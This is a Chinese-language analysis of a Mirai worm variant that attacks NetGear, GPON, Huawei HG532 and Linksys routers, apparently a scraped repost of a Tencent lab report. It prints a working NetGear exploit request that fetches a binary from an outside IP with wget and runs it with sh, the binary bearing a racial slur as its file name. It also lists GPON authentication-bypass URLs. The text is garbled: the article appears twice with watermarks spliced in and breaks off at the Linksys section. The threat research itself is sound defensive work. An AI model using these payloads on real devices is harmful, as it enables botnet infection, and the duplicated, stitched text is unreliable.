路由器漏洞频发,mirai新变种来袭
一、前言
近期腾讯安全云鼎实验室听风威胁感知平台监测发现一款攻击路由器的蠕虫病毒,经过分析,认定此款蠕虫是 mirai 病毒的新变种,和之前的 mirai 病毒不同,该蠕虫不仅仅通过初代 mirai 使用的 telnent 爆破进行攻击,更多通过路由器漏洞进行攻击传播。
二、Playload 与漏洞分析
样本在传播和攻击过程中涉及到4个 PlayLoad ,均针对路由器进行攻击,我们会对相关漏洞进行介绍,并针对传播情况利用抽样数据进行统计分析。
表 PlayLoad 情况
图 影响设备分布
数据来源:腾讯安全云鼎实验室
上图是几款路由器漏洞影响的国家范围,中国、俄罗斯、日本和美国是受灾较为严重的国家。与国家发展程度、网络普及程度有一定关系,也与上述几款路由器的销售区域有着较强的关联。由于国产设备多,安全性不高等原因,我国未来 IoT 安全面临着巨大的挑战。
下面我们针对这四个漏洞分别进行介绍:
01 NetGear 路由器任意执行漏洞(CNNVD-201306-024)
1)漏洞分析:
POC 通过GET方法执行setup.cgi,通过todo命令执行syscmd,通过syscmd来执行下载和执行病毒的命令。
'GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1\r\n\r\n'
代码如下:
A、执行setup.cgi后执行setup_main:
B、使用GET和POST方法都可以提交POC:
Todo参数后面直接调取相关的文件执行,没有做任何过滤,这里也是被利用的地方,直接调用syscmd来执行自己想要的命令。
2)传播情况:
图 NetGear DGN设备远程任意命令执行漏洞攻击数据抽样统计
数据来源:腾讯安全云鼎实验室
发起NetGear 漏洞攻击最多的地区是俄罗斯,可以推断带有NetGear 漏洞扫描的病毒载体感染量大。
02 GPON 光纤路由器命令执行漏洞(CVE-2018-10561/62)
1)漏洞分析:
设备上运行的HTTP服务器在进行身份验证时会检查特定路径,攻击者可以利用这一特性绕过任意终端上的身份验证。
通过在URL后添加特定参数 ?images/,最终获得访问权限:
· http://ip:port/menu.html?images/
· http://ip:port/GponForm/diag_FORM?images/
图 GPONPlayLoad
2)传播情况:
图 GPON设备远程任意命令执行漏洞攻击数据抽样统计
数据来源:腾讯安全云鼎实验室
此漏洞的病毒载体感染范围较大,对于中国、格鲁吉亚、埃及的影响最为广泛。中国美国的光纤发展迅速,埃及和格鲁吉亚受到中国影响,光纤发展速度也很快,也是他们受影响设备多的一个原因。
03 华为HG532系列路由器远程命令执行漏(CVE-2017-17215)
1)漏洞分析
图 HG532 PlayLoad
我们可以观察POC 首先提交一个身份认证信息,之后upgrade里面的NewStatusURL标签中执行了想要执行的命令。模块在upnp中,我们找到upnp模块,并找到NEwStatusURL标签,代码直接通过SYSTEM执行命令(upg -g -u %s -t ‘Firmware Upgrade….’),没有做任何过滤。
2)传播情况:
图 华为 HG532 设备远程命令执行漏洞攻击数据抽样统计
数据来源:腾讯安全云鼎实验室
图 CVE-2017-17215 世界影响范围
数据来源:腾讯安全云鼎实验室
通过华为HG532设备远程命令执行的攻击统计,可以看出,利用此漏洞的病毒载体或扫描在中国、日本、俄罗斯非常活跃。
04 Linksys多款路由器 tmUnblock.cgi ttcp_ip 参数远程命令执行漏洞(CNVD-2014-01260)
一、前言
近期腾讯安全云鼎实验室听风威胁感知平台监测发现一款攻击路由器的蠕虫病毒,经过分析,认定此款蠕虫是 mirai 病毒的新变种,和之前的 mirai 病毒不同,该蠕虫不仅仅通过初代 mirai 使用的 telnent 爆破进行攻击,更多通过路由器漏洞进行攻击传播。
二、Playload 与漏洞分析
样本在传播和攻击过程中涉及到4个 PlayLoad ,均针对路由器进行攻击,我们会对相关漏洞进行介绍,并针对传播情况利用抽样数据进行统计分析。
表 PlayLoad 情况
图 影响设备分布
数据来源:腾讯安全云鼎实验室
上图是几款路由器漏洞影响的国家范围,中国、俄罗斯、日本和美国是受灾较为严重的国家。与国家发展程度、网络普及程度有一定关系,也与上述几款路由器的销售区域有着较强的关联。由于国产设备多,安全性不高等原因,我国未来 IoT 安全面临着巨大的挑战。 copyright 无奈人生
下面我们针对这四个漏洞分别进行介绍:
01 NetGear 路由器任意执行漏洞(CNNVD-201306-024)
1)漏洞分析:
POC 通过GET方法执行setup.cgi,通过todo命令执行syscmd,通过syscmd来执行下载和执行病毒的命令。
'GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1\r\n\r\n'
代码如下:
A、执行setup.cgi后执行setup_main:
B、使用GET和POST方法都可以提交POC:
Todo参数后面直接调取相关的文件执行,没有做任何过滤,这里也是被利用的地方,直接调用syscmd来执行自己想要的命令。
www.wnhack.com
2)传播情况:
图 NetGear DGN设备远程任意命令执行漏洞攻击数据抽样统计
数据来源:腾讯安全云鼎实验室
发起NetGear 漏洞攻击最多的地区是俄罗斯,可以推断带有NetGear 漏洞扫描的病毒载体感染量大。
02 GPON 光纤路由器命令执行漏洞(CVE-2018-10561/62)
1)漏洞分析:
设备上运行的HTTP服务器在进行身份验证时会检查特定路径,攻击者可以利用这一特性绕过任意终端上的身份验证。
通过在URL后添加特定参数 ?images/,最终获得访问权限:
· http://ip:port/menu.html?images/
· http://ip:port/GponForm/diag_FORM?images/
图 GPONPlayLoad
2)传播情况:
图 GPON设备远程任意命令执行漏洞攻击数据抽样统计
内容来自无奈安全网
数据来源:腾讯安全云鼎实验室
此漏洞的病毒载体感染范围较大,对于中国、格鲁吉亚、埃及的影响最为广泛。中国美国的光纤发展迅速,埃及和格鲁吉亚受到中国影响,光纤发展速度也很快,也是他们受影响设备多的一个原因。
03 华为HG532系列路由器远程命令执行漏(CVE-2017-17215)
1)漏洞分析
图 HG532 PlayLoad
我们可以观察POC 首先提交一个身份认证信息,之后upgrade里面的NewStatusURL标签中执行了想要执行的命令。模块在upnp中,我们找到upnp模块,并找到NEwStatusURL标签,代码直接通过SYSTEM执行命令(upg -g -u %s -t ‘Firmware Upgrade….’),没有做任何过滤。
2)传播情况:
图 华为 HG532 设备远程命令执行漏洞攻击数据抽样统计
数据来源:腾讯安全云鼎实验室
图 CVE-2017-17215 世界影响范围
数据来源:腾讯安全云鼎实验室
通过华为HG532设备远程命令执行的攻击统计,可以看出,利用此漏洞的病毒载体或扫描在中国、日本、俄罗斯非常活跃。
04 Linksys多款路由器 tmUnblock.cgi ttcp_ip 参数远程命令执行漏洞(CNVD-2014-01260)
内容来自无奈安全网